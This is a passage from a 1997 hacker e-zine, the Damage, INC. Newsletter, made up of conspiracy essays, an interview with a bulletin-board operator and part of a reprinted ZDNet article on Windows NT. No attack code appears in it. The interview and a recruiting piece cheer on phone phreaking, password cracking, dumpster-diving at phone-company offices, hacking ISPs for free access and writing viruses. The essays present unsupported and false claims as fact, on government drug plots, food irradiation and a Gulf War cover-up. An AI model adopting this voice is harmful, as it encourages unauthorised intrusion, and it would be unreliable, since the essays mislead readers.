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Search String: {NEWS} INTERVIEWS AND INTERROGATIONS - A SPECIAL INTERVIEW WITH THE JOURNALIST. Search String: {INTERVIEWS} OBJECTIVE OPINIONS - ONTARIO HYDRO...A MELTDOWN WAITING TO HAPPEN. Search String: {OPINIONS} REPORTS FROM THE FRONT - WINDOWS NT LIES. Search String: {REPORTS} SOURCE AND SCRIPTS - THE NWO TROJAN BY DAMAGE, INC. Search String: {SOURCE} THE JOURNALIST'S TOP TEN LIST - PRANKS TO PULL AT SCHOOL. Search String: {TOP TEN} CLOSING COMMENTS - BLACKENED'S EXPLOSIVE CLOSING COMMENTS. Search String: {CLOSING} ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ INTRODUCTION: The Damage, INC. Newsletter was created for several important purposes. We want to use this medium as a weapon to fight the corruption that exists, reveal conspiracies and coverups, give useful information to those in the h/p scene. We hope that our articles are not only informative, but also interesting. If we can achieve our goals and make the Damage, INC. Newsletter an entertaining and thought provoking source of reading, then this great undertaking will be worthwhile. This is the first issue of what will become a monthly newsletter that is very unique. Everything that is written will contain the opinions expressed by members of Damage, INC. as well as writers that contribute articles that they've written. Integrity, honour and truth are very important to us. Thus, every aspect of the Damage, INC. Newsletter will reflect those strong beliefs. We cannot be bribed or bought off and we don't make deals with anyone. We aren't seeking fame, profit or anything else. Therefore, you can trust the unbiased, truthful words that are written here. Damage, INC. isn't affiliated with any other groups. The words that we speak are our own. Our word is more than just our reputation, it's everything to us. We want the Damage, INC. Newsletter to prove itself to be a reliable source of useful information. Of course, it's up to the readers to decide for s themselves whether or not they think what we release is quality. {BIG BROTHER} BASHING - Government Control and Corruption in our Society: If you have read the book 1984 by George Orwell, you will immediately recognize the phrase "Big Brother." You have to ask yourself then, how far is our current society from that state? I asked myself this exact question, and my answer? Not that far, if we continue on the way things are going. Canada is not as bad as the United States, but calling us "the 53rd state" is a pretty close comparison. And I must say, things have improved in the 1990's. Equal rights are an important social advancement, and I am glad to see a step in the right direction. All praise aside, I think its time to expose what's really going on... Supposedly we live in a "Democracy". HAHAHAHHAHAHAHA. I need convincing. Let's face it, "by the people, of the people, for the people" is a crock 'a' shit. Government looks out for government first, then the good of society. Ever heard of Watergate? It's just the biggest government coverup in the twentieth century. Ever wonder about the Vietnam War? Now why exactly did Washington send thousands of soldiers to kill millions of citizens? We can never know. Let me tell you about the Black Panthers - A radical negro rights group in the 1960's. The Local law enforcement gave them so much trouble, they eventually fell apart. Despite the fact that they broke no laws, hurt nobody, just wanted to be treated the same. And just how did "the man" control these outbreaks? They flooded the Ghetto with extremely pure, "china-white" heroine, at dirt-cheap prices. If you want proof, watch the news, any channel, at 6:00pm. Murder rate up 7% since last year. "Just another homicide". It's no bullshit, the ghetto warzone was created by none-other than your local government. And then of course, there's the CiA LSD experiments in the 1960's. Making subjects stay up for 40 days at a time, tripped out 24/7. Asking themselves, "so, I wonder how much Acid this guy can take before he goes clinically insane." Nobody knew about these experiments though. The families were bought out, or threatened; the subjects themselves were all eventually admitted to mental institutions. It's scary. And these are just ones I'm thinking of off the top of my head. There are many more documented in books and film. Mel Gibson's latest flick "Conspiracy Theory" is Hollywood's way of showing the Film-going public what really goes on behind closed doors. Blackened talks about Government coverup in war-time situations in this issue. This is a taste of the current political situation. In every aspect, Politics has some underhanded connection in it. Whether it's kickbacks to the Mafia, or deals made with Hells Angels. From the health-inspector who takes bribes, to the Tax Auditor who embezzles funds, the fabric of our Government is woven with Fraud. Corruption is so heavily entrenched in the current political system, I believe things will not get better if we don't do something about it. The outcome if we don't??? Collapse. Total and utter, political, economic, social collapse. But that is at the end. Because If we let things continue the way they are, you will be praying at night for the collapse. The end. Please God end this Hell. That will be your prayer. And they'll hear it. Because "they'll" have technology that can hear everything. One for each block. They'll justify it by claiming it reduces crime, being able to listen in on anybody, at any time. I heard the other day that private companies d/l all newsgroup and public messages from the internet, and log them. They keep massive storage/retrieval systems on every word that get's published on the news groups. How much do you want to bet that CIA or FBI search those databases for "suspicious" discussion? We'll never know. This newsletter is intended to open your eyes. This article was written in the hopes that you will not believe everything "your government" tells you. The way I see it, it's US against THEM. (c)1997 written by The Journalist 04/09/97 CONSPIRACIES AND {COVERUPS} - THE GULF WAR SYNDROME COVERUP...EXPOSED: The Central Intelligence Agency (CIA), Department of Defense (DOD) and top brass of the American Military are all involved in an immense coverup. That includes the former President of the United States, George Bush. He was the Commander in Chief at the time of the Gulf War. Bush also happens to be an ex-CIA director. Former military leaders such as Colin Powell, Norman Schwartzkopf and possibly others were involved in the massive coverup as well. President Clinton has formed a committee that's supposed to investigate the "Gulf War Illness" but nothing productive will result from it. The proof is that one member has already been removed for trying to get CIA and DOD top secret documents de-classified to show that troops were exposed to chemical and biological weapons. Therefore, Bill Clinton is also part of the coverup since he has said and done nothing but setup a fixed commission. Clinton knows the truth but he isn't going to reveal it. According to an ex-CIA member, the Gulf War Syndrome was caused by chemical and biological weapons that American and other coalition troops were exposed to during the war. By his latest estimates, over 100,000 U.S. troops alone were affected and are still suffering. The CIA promptly fired him and tried to silence him by giving out his name, address, unlisted phone numbers and social security number. Saddam Hussein *did* unleash powerful chemical and biological weapons. In fact, some of the "harmless and inaccurate" SCUD missiles were armed with them. During some of the SCUD attacks, major damage was done and wasn't reported. As in, yellow rain (first used in Vietnam and Afghanistan by Russia) burned the skin of troops after a SCUD exploded near their location. Many areas were targets of these deadly, poisonous attacks. Saudi Arabia, Kuwait and certain areas of Iraq are all known to be places where troops saw and experienced strange things. For example, they were instructed to destroy thousands of bombs that were seized. Unfortunately, they weren't told to wear protective gas masks and clothing. They weren't warned of the dangers involved with destroying those types of weapons. Actually, they were told nothing but just expected to perform the duty and serve their country. Meanwhile, there were disposal trenches and vehicles outside the buildings that were marked Biological Hazard etc. Safe methods weren't used to dispose of the chemical and biological weapons though. That's the reason why thousands of soldiers are sick today, years after the conflict ended. The CIA's involvement is vast. They were directly involved and worked closely with the Department of Defense (DOD) to coverup the evidence and deny the fact that troops were exposed to any chemical or biological weapons. They even denied knowing anything about the situation. They claimed to have absolutely no knowledge about those weapons being used in the Gulf War. Meanwhile, they have documents that contradict their own statements. The CIA is a corrupt organization that is built upon lies and coverups. That's how they've done business throughout their entire history. Basically, the CIA is more concerned with their own interests than that of the people they are supposed to protect. They made deals with the Department of Defense. Meanwhile, that is a conflict of interest. The CIA should be keeping track of what the DOD does, instead of covering their negligent asses for them! Troops from many nations are still suffering from the Gulf War Syndrome. Many ground soldiers from the United Kingdom, France, Saudi Arabia and other countries have shown the same symptoms as American troops. They're being told by doctors at Veteran's hospitals that it is all in their heads. It is now September 1997 and still nobody will admit the truth about what actually occurred during the Gulf War. In order to cure the disease and illnesses caused by biological weapons, you must first know what troops were affected, where they were on duty, what weapons were involved in the attack or during the destruction process etc. Until that happens, soldiers that served their countries in the Gulf War will continue to suffer the severe lifelong consequences. Personally, I find it to be a sickening example of the extent that governments will go to coverup documented events. It's a real tragedy that has continued long after the actual battle has ceased. That's the real legacy of the Gulf War. So, before you think about the victory and laugh at the defeat of Iraq and Hussein, consider for a moment the conspiracy and great coverup in the aftermath. (C)opyright 1997 Written by Damage, INC. CORRUPTION AND {GREED} - BURGER KING AND HUDSON FOODS...A LETHAL COMBINATION: Burger King's main supplier was Hudson Foods (a huge American meat company that recently recalled millions of pounds of beef). Last week, Hudson Foods sold their Columbus, Nebraska plant to Tyson Foods. The processing plant was the main beef division for Hudson Foods. Recently, NBC's Dateline reported on the situation. They spoke with former Hudson employees, and were told several shocking stories describing the types of activities that went on at the plant. USDA (U.S. Department of Agriculture) inspection tags that pointed out problems with meat were *removed*, which is a criminal offence. Ground beef that fell onto the floor was used in the making of hamburger patties. "Keep production going!" was their only slogan. Greed and profit drove Hudson Foods to put the health of every customer at risk. They were so corrupt, the management forced employees to change reports that they'd written. In case you aren't aware, meat has to be transported, stored and shipped out after processing at a low temperature to prevent bacteria from growing. Well, Hudson Foods would not allow employees to record temperatures that were too high. Normally, meat should be kept at 34 degrees or lower. Meanwhile, meat at Hudson Foods was consistently above that...sometimes 44 degrees or even warmer. So, they'd tell the employees to probe for a cold spot. If that failed, they'd do anything to influence them into writing down a lower temperature. That can have deadly consequences. Former Hudson employees also reported that it was almost impossible to keep up with the demand from customers, mainly Burger King. This week, Burger King introduced a new hamburger called the "Big King" in an attempt to compete with McDonald's Big Mac. Who is their new supplier? How are they going to be able to supply even more hamburgers to Burger King? Can we trust the food that we pay for and consume? As customers of fast food chains, should we question whether or not the food is tainted and contaminated? Is there any type of protection in place to safeguard consumers? Have you ever heard the term E. Coli used before? If not, continue to read this article and Damage, INC. will educate you by giving you the cold, harsh facts. FOOD RADIATION: After Hudson Foods tainted beef scandal has been exposed, there is a renewed interest in food radiation. When food is irradiated, supposedly any E. Coli, Salmonella and other micro-organisms in the food product are killed. Instead of using good meat handling practices, the quick and easy way out is food radiation. The term "radiation" conjures up all kinds of images. To readers that haven't heard of E. Coli, it's a lethal form of bacteria that is common in animal and human waste. According to a scientist interviewed on CBC Radio, food has been irradiated for over 40 years, and is a common practice in 40 countries. The scientist also claimed that the United States and Canada use the technology in a limited capacity. They supposedly only irradiate imports from other countries like tropical fruits, spices, etc. I seriously doubt that. I believe they also irradiate domestic foods in Canada and I'll stand by those words. The World Health Organization, and the American Medical Association have already endorsed the practice of food radiation. However, the DOA (Department of Agriculture and FDA (Food and Drug Administration) are stalling because of what is viewed as "the public's notion that radiation is harmful... that they are fearful of the word radiation." The FDA commented that the practice would be unacceptable to consumers because of their fear. Why should we trust them? Do you want to ingest food that's been radiated? I definitely don't. During the 1950s atomic bomb tests, scientists claimed radiation levels were safe enough for American troops to be directly exposed to at close range. Should we now believe that food radiation is completely safe? Haha! Radiation can be a deadly weapon. Don't be naive. Don't allow them to brainwash you by saying that it isn't harmful. How could radiation be good for you? What's next? Perhaps they'll want to add poison to our food supply in order to kill other forms of bacteria. The main purpose of the technology is to kill any molds and funguses that are in the food product. (Should moldy meat be used in the first place?) Setting up the technology is expensive, but the scientist claimed that most of the big meat packers could easily afford it. Hudson Foods could've easily afforded it, since they would bus in homeless drug addicts from New York City and Mexican immigrants to work at their meat processing plant. Now that's what I call a cheap labour force. Can employees such as that be trusted to handle food properly? I think not. They didn't even test meat in the plant's lab. They used the excuse of being too overloaded with orders from Burger King. At any rate, food radiation shouldn't be the solution. It's all about greed and making huge profits. Food safety is the last priority and totally ignored. The food radiation process is as follows: First, the meat is examined with all of the current methods. Second, the meat is cleaned, and processed (cut into retail cuts of meat, packaged, etc.). Then they are dropped onto a conveyor belt and sent to a "shielded" part of the plant. The food is then exposed to intense gamma rays. That is correct, gamma rays. The same gamma rays that turned the Incredible Hulk green! The process takes time, so the meat is exposed more than just a few seconds. The gamma radiation supposedly breaks down the DNA of the offending micro-organism, rendering it unable to reproduce. When the life cycle of the existing micro-organism has ended, the scientist said that the offending organism (like E. Coli) is gone, unless the meat is put into conditions where the micro-organism thrives. In other words, the meat can still become tainted if it's improperly handled and stored at the wrong temperature. What happens if it's exposed to gamma rays for an extended duration? The workers are bound to make mistakes and errors always happen eventually. NBC and CNN interviewed farmers that supplied Hudson Foods with beef. They admitted on television that they feed their cattle chicken shit, sawdust, dead dogs, cats and wild animals (roadkill) that they find on the side of the road near their farms. Basically, their feed consists of *anything* except grain. Burger King has yet to disclose the name of their new meat supplier. I wonder why? Yet, they've started an advertising blitz for the "Big King" burger to divert the media attention away. It's business as usual for that fat cat corporation. As the saying goes, shit in and shit out. If you feed the cattle chicken shit, what do you think the burgers are going to contain? Their famous Whopper should really be called a Plopper. Haha. If you want to eat shit and die, have it your way right away at "Burger" King. The next time you're at Shit King... standing at the counter and ready to order...do yourself a big favour and think about this article. ;) As a consumer, you have to be responsible for your own health and protection. Don't believe, trust and rely on the government or any fat cat companies. They're greedy, corrupt and don't care how many people become sick and die from E. Coli etc. (C)opyright 1997 Written by Damage, INC. H/P INFORMATION AND {NEWS} - Motivational Neophyte Blurb... So obviously you're reading this because you want something more out of the (519) BBS scene. Warez just don't do it for you. Play one game, you've played them all right?. Plus, you can't really put "I played a lot of pirated video games" on your resume now can you?. My name is The Journalist. I have been BBS'ing for over 4 years. Not that long, but longer than most. I have watched the quality of users and BBS's deteriorate like a snowman on a sunny day. I'm not saying things are lame now. Far from it. There just seems to be a major lack of leaders. You know, people like me :) People who go out of their way to make BBS-Land a better place. Now, what I'm saying here is, things are gonna change around here. Not because I say so, but because *you* want them to. C'mon, can you say that you have experienced the thrill of beige boxing? The satisfaction of breaking a password? These things are still entirely possible. One comment I hear all too often is "... but all those text files are written for like 20 years ago." BULLSHIT! It's just a little harder because now you have to sift through the shit to get the good stuff. I'll tell you now, most boxes don't work, because The phone company got wise and made it harder to get free calls. But that doesn't mean shit. Go to a bell office, and do some trashing. You might find some interesting stuff, you might not. But it was fun right? One point I want to get across is that the h/p scene has evolved. Not anymore is it just about getting an extender or hacking a system. It's about being on the frontier of the information age. Think about that. The *information* age. We are living one of the biggest revolutions of our time. The Internet? Think about what you imagine the internet will be in 10 years? Think about how in history class, one of the projects will be "the history of the internet" We are living it baby, and once you realize this, you understand the importance of preserving free speech, and condemning censorship. (all you internet-porn-kings! :)) The conclusion is this... Welcome to the future of H/P/A/C/V (c)1997 written by The Journalist 04/09/97 It's 11 o'clock... Do you know where your hard drive is? ;) This is the local h/p news section. The state of the group ati (access to information) is now in question. The ati web page lasted mere weeks and is no longer up. The Crypt (ati's whq) wasn't online for the entire summer and ati_net was basically dead. Not only that, tck disappeared into the abyss and wasn't seen on any local h/p boards...until recently when he resurfaced. This commentary isn't meant to bash ati. I'm just reporting the news as it exists and stating the facts. The main point is that ati is inactive and hasn't released anything since May 1997. Is it the beginning and the end for ati? Will tck resurrect the group? I'm not going to draw any conclusions. We'll just have to wait and see what develops. {INTERVIEWS} AND INTERROGATIONS - A SPECIAL INTERVIEW WITH THE JOURNALIST: The following text is a recent interview that BLACKENED conducted on FoI with the newest member of Damage, INC. -B is BLACKENED -TJ is The Journalist Introduce yourself to the readers of the Damage, INC. Newsletter. -B If you don't know me already, I run a h/p support board in (519). I have been in the bbs scene for a long time, and many will know me as a creative and innovative thinker :) -TJ What made you become interested in the whole h/p scene? -B Hmm... that's a good question Blackened. I would have to say it started a few years back when I came across some txt files on The Digital Network. I had a 2400 at the time, and Text files were easy to get. I started reading about hacking, and more of the anarchy, (ripping off pop machines and the like :)) Basically it snowballed from there. I found other h/p boards in the area, and started calling LD to &TOTSE and other famous sites. The rest as they say is history. -TJ ;) After that, why did you decide to start FoI and run your own board? -B Well I think a small history is needed here, because I decided to run a board pretty soon after I started bbs'ing. I started as a PD board. And progressed to Warez (under the bbs ICE COLD :)) When I realized how pointless warez were, I decided to convert over to h/p, which has been one of the best decisions I ever made. h/p has always had a small following, and I guess I hoped that running FoI would attract otherwise warez geeks to a more fulfilling interest. -TJ How long has FoI been online and supporting h/p now? -B I would have to say about 18 months give or take 5 years :) hehe no, probably 18 months to 2 years. -TJ That's cool. Would you describe FoI as being more h/p related or general information and ideas? -B umm.. let me think about that one. For those who have bravely ventured thru the file bases of FoI, I'm sure you'll note the diversity of files online. I like to have h/p as the focus, but let's face it, sometimes you just want to read about something other than hacking UNIX or such. FoI is based on Information - regardless of topic. -TJ For those that haven't called FoI that might be reading this newsletter, what reason would you give for them to call your board? -B hehee :) a sales ad eh? No, FoI is different. If you are sick of warez, or sick of certain people in the warez scene, you should call FoI. If you are haunted by the corruption in our current political system, you should call FoI. If you like the idea of taking advantage of the big corporations (Bell, etc) you should call FoI. There is something for everyone at FoI. Except maybe the pups. -TJ Now that you've discussed FoI a little and described it to our readers, I'd like to ask you what difference you think being a Damage, INC. Member and FoI being the new Damage, INC. Dist. Site will make (to yourself, FoI and 519)? -B I expect Damage, INC. will boost user interest in FoI. For myself, Damage, INC. represents an organization where the member's interests are the same as my own. It is very rewarding. I know I will learn new things by being a part of Damage, INC. And I know for a fact that an FoI/Damage, INC. Combination will have a strong, positive effect on the diminishing (519) scene. -TJ How do you think the Damage, INC. Newsletter and interviews such as this one will affect the local h/p scene? -B By providing local, up-to-date information and support, the Damage, INC. Newsletter will open a lot of users eyes to a more intelligent way of bbs'ing. We constantly refer to this as a "revolution", and I whole-heartedly believe the Damage, INC. Newsletter can continue to provide unbiased, useful information, thus resulting in a more enlightened h/p scene with much more activity. -TJ Do you know of any other local h/p groups? -B Not as of yet, but I expect to see many "wannabees" pop up trying to imitate us. Damage, INC. and FoI are the foundation of the h/p scene in (519), simply because of our long standing presence in the community. We demand respect, we get respect, because of a stability not found in most other groups. (Commenting on the recent Sike dismemberment, and other groups which could not make it). All the power to any other h/p groups that start, and I myself will fully support any groups, but only if they appear solid, and interested. -TJ That's an excellent answer. Now to a more personal question. Have you ever been idolized and "worshipped" by any local users that are new to the h/p scene? If so, is it something that you dislike? -B hehehe, well which hacker hasn't been idolized by Blade Runner <g> but that's not a bash. In the past many inexperienced users have been at awe over my knowledge of h/p and related topics, and I tend not to really care if they go overboard a little :) This is such a new, changing way of bbs'ing that I like to help people where I can. -TJ Haha. ;) I've had my own experiences with Blade Runner. Anyways, you've done so much to spread information and educate the users that call FoI, but is it ever tiresome to be asked lame questions such as "How do I build a beige box?" or "How do I hack....whatever?" by users? In essence, I want to know if it becomes annoying to be asked questions about information that's already online and available on FoI. -B Exactly, Blackened. Honestly? It's insulting. I go through all the time and effort to get files online, make sure all files have descriptions, so when a newbie asks me such a question I usually have 4 letters for him - RTFM -TJ There's been so much debate recently about bbsing, the internet etc. as it relates to the overall h/p scene. Do you think there's anything wrong with quality h/p web sites? Or, do you believe that the h/p scene should remain on a smaller scale... with boards and users that "know each other"? -B That is a monumental question, and I'm sure you don't want me to type pages of my opinion :)... hehe, I have thought a lot about the internet's effect on the bbs scene, and I'm saddened to watch something I've grown to love slowly diminish into the shadows of the Internet. I came to the realization recently though, that this is simply because we're letting it rot away. Its time to take back the streets. Well, bad terminology, but i have nothing against the Internet, in fact many of the files on FoI come from the Net. Its a great source of information, but it can never compare to the intimacy of a well-run bulletin board system. -TJ I completely agree with that. The internet is good for distribution, but doesn't have the same feeling as boards. On the other hand, I think it's good for distribution purposes. So, do you think Damage, INC. should setup it's own web site in the future for world wide distribution? (at the same time continue to support boards such as FoI). -B Absolutely. We will have the best of both worlds. -TJ Now that we've discussed the internet etc. what future plans do you have in store for FoI? How do you think boards will change in the next 5 years? ;) -B ahh, that is a very interesting question that I have not given that much thought to. I think we will see a merge of the bbs scene and the internet in the 21st century. Each medium complements each-other, and I like to use this analogy - the bbs scene is like a small village. The internet is NY City. The two places are worlds apart, but must somehow live together in harmony. To accomplish this, some laws are set by the "big guy", and others are allowed to be defined by each individual community/village. If you understand what I'm saying, then good, but if not, then that's understandable because that was kinda cryptic :) -TJ I do, but I can't speak for the readers. It's nearing the end of 1997, do you think the future of h/p is a bright or dismal one? Also, do you have faith in the new people entering the h/p scene? Is there any hope that they'll learn and help to evolve and progress h/p? -B They say there's no such thing as a problem child, its a "problem-parent." Its up to you, me, and the person reading this right now to make sure we teach our own h/p values, and ways of thinking to the younger generation. That means, the future of h/p rests on our shoulder's right now. If Damage, INC. and FoI went down right now, the h/p scene would die. Its the truth. But I look on the bbs's I'm on, and *most* do have an earnest H/P/A/C/T/V section. This pleases me, so I think yes, there is hope. The next generation of h/p'ers are going to be entering the dawn of a millennium. I'm sure they'll know what to do. -TJ On the same note, do you agree with warez boards trying to be wannabe h/p boards? As in, most of their file areas are filled with warez... while they also try to support h/p by having a single file area? -B Pirated software originated with the same intentions as h/p. Hackers who were broke exchanging useful software to continue their search for the truth. Now it seems that has been forgotten, and the 0-2 day warez race is dominating the warez culture. Warez culture has gone to shit, and I want h/p to have nothing to do with it. -TJ I agree with that. Here's another interesting question... How do you feel about newsletters and magazines that charge money for a subscription? As you already know, the Damage, INC. Newsletter is totally free. Personally, that's something that I believe in strongly. The spread of h/p information shouldn't cost the users that want to learn. Do you agree or disagree with that statement? -B The best things in life are free - that's all I have to say. -TJ Would you ever pay to call a h/p board? -B Not if I can get the exact same thing for free somewhere else. No I would not pay for a h/p board. -TJ Okay, now that we've discussed the "pay for access" aspect of h/p boards etc. I'd like to ask you a question about ethics. If you had the knowledge to hack "fictional software", and a user offered to pay you to hack a board running under that software... would you become a hacker for hire? ;) -B Wow!, that's a doozy of a question :) I hope I can say that I would not "sell-out" but people do desperate things in desperate times. How much money are we talking about, and what kind of hack does he want? -TJ Let's say $50 as an example, and the user/customer wants you to hack the system and provide him with the userfile and any passwords necessary to allow them to logon under Sysop access. -B Hmmm... I would promptly tell him to Fuck off. -TJ ;) That's a good answer, and I applaud you for having the proper ethics. I won't mention any names, but this area is famous for "phreaks" that try to sell extenders, pbxs, other codes. -B Can I mention a name? :) -TJ That's your choice... -B hehe... Well its interesting because I once paid this same guy $20 for a voicemail box 1800 system a few years back. So that kinda contradicts my answer previously on paying for stuff, but lets just say LL is the most I'll give out. -TJ Okay, that's fair enough. Do you think it's right for people to be selling codes, internet accounts etc. in order to make profit from the h/p scene (and take advantage of naive users that are new to the scene)? -B No comment. -TJ Okay... Do you think Damage, INC. should ever sell information such as codes, accounts etc.? -B No. As long as I am part of that organization, I would not feel comfortable selling pwords, codes etc. I *honestly* must say though, I know its hard to turn down $20 or $50 when its handed to you like that, and I don't want to seem like some "perfect" h/p'er because that would be more damaging, than to admit I am human, and sometimes make mistakes. -TJ Yes, we're all flawed. Personally, I've been offered money ($50 and more), but always turned it down in order to maintain my own credibility. ;) The main reason I asked though, was because I believe if you sell codes and other information... then you aren't teaching the person anything. That is, other than they can just "buy anything" they want instead of experimenting and learning by reading etc. I don't know of any perfect h/p'er, but I think that our motives are honest and noble. What benefit do you think the Damage, INC. Newsletter will have to this area after it's been in publication for a few years? -B Just to say, you just pinned the tail on the donkey man. Look at the bible, (and although I don't believe in Christianity, I *do* believe Jesus existed). "Give a man a fish, feed him for a day, *Teach* a man how to fish, feed him for a lifetime." -TJ Yes, that's exactly what I was trying to express. ;) -B And to comment on your second question; I have no doubt, those who become dedicated readers of the Damage, INC. Newsletter will feel a fullness enter into their lives, never experienced before. I feel it is important to stress that while Damage, INC. does focus attention on Hacking & Phreaking; It also takes a look at society from a whole new perspective, which is beneficial to anyone who sees that way as a result of reading our articles. -TJ Do you think it's a good idea for this newsletter to include articles that were written by people that aren't associated with Damage, INC. (as long as they are given full credit)? -B Umm, that would depend on the situation really. At work I clipped out a newspaper article from <guiltily> "The SUN" which looked at Di's death from a "conspiracy" point of view. It totally enlightened me to the fact that any situation always has two or more sides, and to be objective, you have to try and see things from that "other" perspective ;) -TJ Good point. I want to change the topic to trojans now. How do you feel about the debug script for NWO being included in this issue? -B I think it is a provocative move, and will certainly stir up the bbs scene with a big plastic spoon. The outcome of releasing it can only be left up to my imagination, but attention is a positive thing right now, and I see no harm in including it. -TJ Haha (if it stirs things up, that's cool with me). Do you think it's a good idea to include source and scripts for viruses, trojans and utilities in the future issues? -B Only to teach readers something new so that they can one day make their own viruses/virii :) I know from personal experience that looking at someone else's code accelerates the learning process greatly. Especially if that code is explained, line by line. -TJ Yes, whatever source code we include should *always* be used as a learning tool by our readers. There's been debate for years about hacking for information/hacking and doing damage. What's your opinion? This is the final question. I hope you've enjoyed doing this interview. If you have any other comments to make, feel free to write them. ;) -B :) Okay. Well to answer your initial question; and this is also a note to interested readers, I learnt a lot of information for books such as hmmm bad memory, Hacker Crackdown was one, and other various text files on Hackers such as Phiber Optik, The Fry Guy (a very controversial case that one) and Captain Crunch. There was a certain code of ethics that was very plain and simple, but has been cast aside today. It is this : hacking is to learn only. Hacking a system is to gain some new knowledge about the o/s or computer. If a hacker modifies or deletes files in any way, they cross a boundary in which Hacking becomes unethical. This is why hacking has gotten such a bad name, because it causes damage. -TJ In your opinion though, is it okay to hack an ISP, borrow accounts, use the internet for free? (without doing any damage to any systems)? -B Yes, what about you? -TJ Yes, I think that's fine... since it should be free. ;) Any other comments? - B nope -TJ Okay. Thanks for sharing your thoughts and agreeing to do this interview. It's the first of many that'll be included in the Damage, INC. Newsletter. Hopefully, the readers have benefitted by reading this interview... and will consider what was said here. -B That is all I hope too Blackened. I want to make it clear that my purpose is to be service to neophyte h/p'ers who are genuinely interested to learn. I will do my best to help anyone who asks my advice. This also includes FoI Archives at 519-846-8598. Thanks Blackened, this has been fun :) -TJ Thanks again The Journalist. And to our readers, just remember that you could also be featured in one of my interviews in the future. ;) -B OBJECTIVE {OPINIONS} - ONTARIO HYDRO...A MELTDOWN WAITING TO HAPPEN: The calamity at Ontario Hydro should have received more media attention than it did. The general media did not cover the consequences of Hydro's deteriorating nuclear reactors. That is what premier Mike Harris and the fat cat executives at Ontario Hydro counted on. This newsletter is the perfect forum to look into this issue further. Be sure to read the following facts and objective opinions, and then formulate your own. Being an informed person will help you to see through the government's lies and coverups. After intense public pressure, and a scathing 60-page study by the Atomic Energy Control Board, Ontario Hydro's gross inefficiency has been fully exposed. Hydro's president and CEO, Allan Kupcis couldn't resign fast enough after it was announced that seven of Ontario's 19 operating nuclear reactors will supposedly be shut down. Carl Andognini, leader of the seven member team that wrote the report concluded that many of Hydro's problems were rooted with people rather than nuclear technology. In Andognini's words, Hydro's management acted like a "feudal fiefdom without professional standards, managerial expertise or, above all, accountability." In my words, Hydro's management acted like all the other government-controlled monopolies. Hydro has a reported $17.6 billion invested in their plants. All they have to show for it are worn-out reactors that have been leaking various chemicals (most recently deuterium oxide) for nearly two decades. Andognini also reports that Hydro has "minimally acceptable" or "below industry standards" when it comes to normal operations or being prepared for an emergency, such as a meltdown. Rocked by being exposed by the truth, officials are desperately trying to keep the big fat boat afloat. Hydro has convinced Andognini to join them. He claims he will start initiating the recommendations in his report. Andogini has promised to remain for 3« years. He is optimistic that he can turn the nuclear division around. Three coal and oil-fired generating plants have been reactivated. They will make up for the power loss that will be caused by the dormant reactors. During its years as a government-controlled monopoly, Hydro has accrued a huge debt. The Ontario government has guaranteed $24 billion of Hydro's debt. Upgrade costs for an additional 12 reactors will cost Ontario taypayers an estimated $3.6 billion now, and $5.8 billion over the next four years. Of course costs will mostly likely be much more, since those estimates come from the Ontario government. One additional cost that Hydro didn't include is the cost of shutting down seven reactors (four at the Pickering plant, three at the Bruce plant) over the span of a 30 year period. Plus the closed plants will have to be staffed to monitor radiation levels. The fate of Ontario Hydro is still unfolding. Ontario premier Mike Harris has been sitting on his hands, unwilling to give up the government's communist-like believe that they need to control the hydroelectric power industry. Andognini responds to the question of deregulation by predicting Hydro will be ready for an "open market" in 2 years. However, competition and deregulation are words that are foreign in this red province. Ontario Hydro's actions should be of great concern. Due to gross mismanagement, Hydro's nuclear reactors have not been properly maintained and are operating past their prime. Chemical leaks have been occurring on a consistent basis for 20 years, although many have been covered up until now. It is not unreasonable to agree with Andognini's finding that Hydro is at best minimally prepared for a huge disaster. Therefore, we have old, poorly maintained reactors and staff that are not prepared. In my opinion, that leads me to believe that there is a realistic chance of meltdown at any of the nuclear reactors. The Ontario Hydro monopoly must end. It has proven to be a total failure. They have lost all of their credibility and should not be trusted. Hydro is a tremendous drain on taxpayers and a disaster waiting to happen. A disaster that could make Chernobyl look like a little bit of acid rain. The only sensible course of action is for Hydro to get out of the power business. The entire industry should be deregulated and opened up to competition. In the United States, the power industry has been deregulated in some states since 1992. Since then five nuclear power plants have been shut down because they were fiscally unreasonable. More economical ways were found to provide those areas with power. Unfortunately it is business as usual at Ontario's disgraced power monopoly. Now Ontario Hydro is talking about "shutting down the reactors at the end of their lifespan." As the nuclear reactors continue to deteriorate, Harris can't let go of any power. He is hellbent on becoming the dictator of Ontario, and controlling the only source of power in Ontario gives *him* power. And Ontario Hydro's executives (new and old) are in a mode of panic, doing anything they can to maintain their monopoly. With no competitors (predators) they can continue to operate under the status quo. The scandal will be forgotten by most of the media and public until Hydro faces another self induced disaster. We can only hope that the next one doesn't cost us all our lives. CANDU can meltdown. (C)opyright 1997 Written by Damage, INC. {REPORTS} FROM THE FRONT - WINDOWS NT LIES By ED BOTT Garnered from ZDNet What is it about the computer industry that compels people to stretch the truth past the breaking point? Every week we dig through a pile of press releases, news clippings, white papers, and reviewer's guides, most of them filled with rumors, half-truths, exaggerations, false conclusions, tap dancing, and spin that's gone completely out of control. Not to mention outright whoppers. This year, for the third straight year, we've gathered a collection of the ten most popular lies about the trendiest technology. In 1995 it was no trouble to round up ten lies about Windows 95. Last year we focused on the Internet. LIST OF LIES Runs-anywhere Secure Military Standards Crash-proof Server Value Notebooks Replace Win95 Zero Administration Death by NC This year we set our sights on Microsoft Windows NT. Why NT? After Microsoft tacked the Windows 95 shell onto NT, it was suddenly the hottest software around, and when you're hot, people talk. But the trouble with NT is its enormous complexity, which makes it hard to craft a simple marketing message. That means Microsoft occasionally oversimplifies issues and smooths over the rough edges in NT. And Microsoft bashers can have a field day using technical trivia to reach unwarranted conclusions. Just once, we'd like to read a press release that didn't sound like an outtake from Jim Carrey's Liar Liar. Somehow we don't think that's going to happen anytime soon, though. Want to know what's really going on with Windows NT? We've got the truth, the whole truth, and nothing but the truth. By ED BOTT Illustrations by REGAN HONDA Lie 1 NT Works with Most PCs What's made DOS and Windows so successful? Arguably, it's their run- anywhere nature. Take a shopping cart full of spare PC parts, slap 'em into a case, and you'll be able to boot up Windows 95. But try the same experiment with NT, and you'll probably find yourself staring at the dreaded Blue Screen of Death. Microsoft claims that "Windows 95 supports one-third more device drivers than does Windows NT Workstation (approximately 1,000 more drivers). . . However, certain types of devices, such as video, audio, and PCMCIA are areas where 